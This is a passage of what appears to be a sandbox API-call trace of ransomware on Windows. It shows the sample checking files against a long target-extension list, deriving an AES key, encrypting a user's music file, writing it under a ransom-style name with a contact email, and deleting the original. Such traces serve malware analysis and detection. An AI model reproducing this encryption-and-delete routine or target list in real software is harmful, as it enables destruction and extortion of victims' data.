dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".mp3") returned=".mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0191.835] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0191.835] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0191.835] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\tkww00x4od.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\tkww00x4od.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0191.840] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0xe035, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18a640*=0xe035, lpOverlapped=0x0) returned 1
	[0191.844] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.844] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcae68) returned 1
	[0191.847] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.848] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0191.848] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.848] CryptHashData (hHash=0xfb9570, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0191.848] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.848] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb9570, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb91b0) returned 1
	[0191.848] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.848] CryptEncrypt (in: hKey=0xfb91b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0xe035, dwBufLen=0xe035 | out: pbData=0x0*, pdwDataLen=0x18a20c*=0xe040) returned 1
	[0191.850] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0191.850] RtlMoveMemory (in: Destination=0xfeb1c0, Source=0xfdd180, Length=0xe035 | out: Destination=0xfeb1c0) 
	[0191.851] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.851] CryptEncrypt (in: hKey=0xfb91b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfeb1c0*, pdwDataLen=0x18a1ec*=0xe035, dwBufLen=0xe040 | out: pbData=0xfeb1c0*, pdwDataLen=0x18a1ec*=0xe040) returned 1
	[0191.853] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.853] CryptDestroyKey (hKey=0xfb91b0) returned 1
	[0191.853] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.854] CryptDestroyHash (hHash=0xfb9570) returned 1
	[0191.854] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.854] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0191.854] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0191.854] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0191.855] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.855] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0191.857] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\tkww00x4od.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 107
	[0191.857] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\tkww00x4od.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\tkww00x4od.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0191.858] WriteFile (in: hFile=0x390, lpBuffer=0xfeb1c0*, nNumberOfBytesToWrite=0xe040, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfeb1c0*, lpNumberOfBytesWritten=0x18a648*=0xe040, lpOverlapped=0x0) returned 1
	[0191.865] CloseHandle (hObject=0x390) returned 1
	[0191.865] CloseHandle (hObject=0x388) returned 1
	[0191.866] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\tkww00x4od.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\tkww00x4od.mp3")) returned 1
	[0191.873] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\tkww00x4od.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\tkww00x4od.mp3")) returned 0
	[0191.874] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc81fe70, ftCreationTime.dwHighDateTime=0x1d96b74, ftLastAccessTime.dwLowDateTime=0x43641f90, ftLastAccessTime.dwHighDateTime=0x1d97139, ftLastWriteTime.dwLowDateTime=0x43641f90, ftLastWriteTime.dwHighDateTime=0x1d97139, nFileSizeHigh=0x0, nFileSizeLow=0x646f, dwReserved0=0x0, dwReserved1=0x0, cFileName="V8F8_.m4a", cAlternateFileName="")) returned 1
	[0191.874] lstrcmpW (lpString1="V8F8_.m4a", lpString2="..") returned 1
	[0191.874] lstrcmpW (lpString1="V8F8_.m4a", lpString2=".") returned 1
	[0191.874] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\"
	[0191.874] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\", lpString2="V8F8_.m4a" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\V8F8_.m4a") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\V8F8_.m4a"
	[0191.874] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\V8F8_.m4a") returned 60
	[0191.874] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0191.875] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\V8F8_.m4a", cchLength=0x3c | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\v8f8_.m4a") returned 0x3c
	[0191.875] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.875] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\v8f8_.m4a", lpSrch="help_decrypt_your_files") returned 0x0
	[0191.875] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\v8f8_.m4a" | out: lpString1="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\v8f8_.m4a") returned="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\v8f8_.m4a"
	[0191.875] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\v8f8_.m4a") returned 60
	[0191.875] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0191.875] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.876] StrStrW (lpFirst=".m4a", lpSrch=".") returned=".m4a"
	[0191.876] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.876] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".m4a") returned=".m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr